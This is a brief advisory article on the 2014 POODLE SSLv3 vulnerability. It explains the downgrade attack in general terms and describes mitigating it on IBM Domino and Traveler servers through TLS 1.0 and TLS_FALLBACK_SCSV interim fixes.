In September 2014, a team at Google discovered a critical flaw in SSL 3.0 which can allow an attacker to extract secret information from inside of an encrypted transaction. This vulnerability is known as POODLE attack (Padding Oracle On Downgraded Legacy Encryption).
The POODLE attack can be used against any website that supports SSL version 3.0. As SSLv3 is no longer secure, browsers and websites need to turn it off and use more modern security protocols, like TLS, in order to avoid compromising users’ private information. Web browsers no longer compatible with SSLv3 or able to downgrade from TLS cannot connect to Domino and Traveler servers only supporting SSLv3 over HTTP.
Here we take a look at what can be done at the Domino server level to address this issue.
How it Works
This attack is a "man-in-the-middle attack" affecting Web browsers.
Any website that supports SSLv3 is vulnerable to POODLE, even if it also supports more recent versions of TLS. In particular, these servers are subject to a downgrade attack, in which the attacker tricks the browser into connecting with SSLv3. This relies on a behavior of browsers called insecure fallback, where browsers attempt to negotiate lower versions of TLS or SSL when connections fail.
By exploiting this vulnerability, an attacker can decrypt SSL sessions and access the plaintext of encrypted connections to gain access to things like passwords and cookies, enabling him to access a user’s private account data on a website.
Browsers connecting via SSLv3 to Domino or Traveler servers running HTTP are exposed to the POODLE attack.
How to Solve the Issue
The recommended response to mitigate this issue is to support TLS_FALLBACK_SCSV. This is a mechanism that solves the problems caused by retrying failed connections and thus prevents attackers from inducing browsers to use SSLv3. It also prevents downgrades from TLS 1.2 to 1.1 or 1.0 and so should be sufficient to prevent future attacks.
IBM has released Domino server Interim Fixes that implement TLS 1.0 with TLS_FALLBACK_SCSV support for HTTP to protect against the POODLE attack.
Implementing TLS 1.0 for Domino will protect Domino and Traveler and will allow browsers to still connect to the server after they have been changed to address the vulnerability.
Refer to the IBM Domino support for TLS 1.0 wiki page for detailed information and the exact steps to take to implement the solution according to the version of Domino or Traveler you are currently running.
IBM Related articles
- How to disable SSLv3 on a IBM Domino Server?
- IBM Domino Interim Fixes to support TLS 1.0 which can be used to prevent the POODLE attack
- Implementing TLS support with Domino & IHS
- Security Bulletin: POODLE Attack Affects Domino
- TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV) for Preventing Protocol Downgrade Attacks
Microsoft related articles